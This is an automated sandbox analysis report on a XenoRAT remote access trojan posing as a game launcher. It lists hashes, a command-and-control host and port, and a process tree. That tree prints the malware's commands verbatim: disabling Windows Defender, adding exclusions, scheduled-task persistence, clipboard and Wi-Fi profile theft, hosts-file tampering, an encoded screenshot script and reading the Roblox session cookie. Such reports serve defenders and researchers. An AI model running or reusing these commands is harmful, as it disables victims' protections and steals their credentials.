Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-07-2024 16:57

General

  • Target

    748f98d4289c294ee45a7b8a6c9aa9c0NeikiAnalytics.exe

  • Size

    7.4MB

  • MD5

    748f98d4289c294ee45a7b8a6c9aa9c0

  • SHA1

    255b8f45a7e994abc1cb3fa97f7d09041888011c

  • SHA256

    74f7d78429b1bca9516da39343118b371d14e6fdb25b8708ff3d32391c84ab8c

  • SHA512

    a4a838f2cedaeb17d61bae3808adc20a8fbaeec48d8a423240c3eb18509f73782822ed499642840a64212196c1f15af7101975c9362576ff9ef257a1095825aa

  • SSDEEP

    196608:SrH5P9VjurErvI9pWjgfPvzm6gsFEB4Auq:YlNurEUWjC3zDb84Auq

Malware Config

Extracted

Family

xenorat

C2

himekosworld-37849.portmap.host

Mutex

Xeno_rat_nd8912d

Attributes
  • delay

    5000

  • install_path

    temp

  • port

    37849

  • startup_name

    WindowsClient

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\748f98d4289c294ee45a7b8a6c9aa9c0NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\748f98d4289c294ee45a7b8a6c9aa9c0NeikiAnalytics.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Users\Admin\AppData\Local\Temp\748f98d4289c294ee45a7b8a6c9aa9c0NeikiAnalytics.exe
      "C:\Users\Admin\AppData\Local\Temp\748f98d4289c294ee45a7b8a6c9aa9c0NeikiAnalytics.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\748f98d4289c294ee45a7b8a6c9aa9c0NeikiAnalytics.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1560
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\748f98d4289c294ee45a7b8a6c9aa9c0NeikiAnalytics.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3140
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4332
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3076
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2744
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2372
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1160
          • C:\Users\Admin\AppData\Local\Temp\XenoManager\bound.exe
            "C:\Users\Admin\AppData\Local\Temp\XenoManager\bound.exe"
            5⤵
            • Executes dropped EXE
            PID:2396
            • C:\Windows\SysWOW64\schtasks.exe
              "schtasks.exe" /Create /TN "WindowsClient" /XML "C:\Users\Admin\AppData\Local\Temp\tmp808A.tmp" /F
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2484
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                7⤵
                  PID:1324
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ohh , looks like we do not support that kind of device you are using yet .......', 0, 'ReksFN_Launcher gg/reks', 0+16);close()""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5064
          • C:\Windows\system32\mshta.exe
            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ohh , looks like we do not support that kind of device you are using yet .......', 0, 'ReksFN_Launcher gg/reks', 0+16);close()"
            4⤵
              PID:3520
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1088
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4776
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1728
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1660
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4356
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              4⤵
                PID:2900
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3296
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                4⤵
                  PID:2328
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4192
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                  • Detects videocard installed
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2852
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3276
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                  • Detects videocard installed
                  PID:4244
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​‏ ‎ .scr'"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3476
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​‏ ‎ .scr'
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4424
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3548
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:3284
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2368
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:2316
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                3⤵
                  PID:4580
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    4⤵
                      PID:3240
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                    3⤵
                      PID:704
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-Clipboard
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2112
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      3⤵
                        PID:4824
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          4⤵
                          • Enumerates processes with tasklist
                          PID:3016
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:4388
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:3672
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                            3⤵
                              PID:4720
                              • C:\Windows\system32\netsh.exe
                                netsh wlan show profile
                                4⤵
                                • Event Triggered Execution: Netsh Helper DLL
                                PID:3304
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "systeminfo"
                              3⤵
                                PID:420
                                • C:\Windows\system32\systeminfo.exe
                                  systeminfo
                                  4⤵
                                  • Gathers system information
                                  PID:4192
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                3⤵
                                  PID:5016
                                  • C:\Windows\system32\reg.exe
                                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                    4⤵
                                      PID:3640
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                    3⤵
                                      PID:1324
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3412
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jzo0byp5\jzo0byp5.cmdline"
                                          5⤵
                                            PID:3748
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79B4.tmp" "c:\Users\Admin\AppData\Local\Temp\jzo0byp5\CSCF28FF030349A4459BCD7684FC8D6DE7B.TMP"
                                              6⤵
                                                PID:832
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                          3⤵
                                            PID:4108
                                            • C:\Windows\system32\attrib.exe
                                              attrib -r C:\Windows\System32\drivers\etc\hosts
                                              4⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:4272
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:4544
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:1088
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:3668
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:3672
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                    3⤵
                                                      PID:3844
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                                        4⤵
                                                        • Drops file in Drivers directory
                                                        • Views/modifies file attributes
                                                        PID:3932
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:3400
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:4740
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          3⤵
                                                            PID:2456
                                                            • C:\Windows\system32\tasklist.exe
                                                              tasklist /FO LIST
                                                              4⤵
                                                              • Enumerates processes with tasklist
                                                              PID:4272
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            3⤵
                                                              PID:2356
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                4⤵
                                                                  PID:3800
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                3⤵
                                                                  PID:3672
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    4⤵
                                                                      PID:3932
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    3⤵
                                                                      PID:4920
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        4⤵
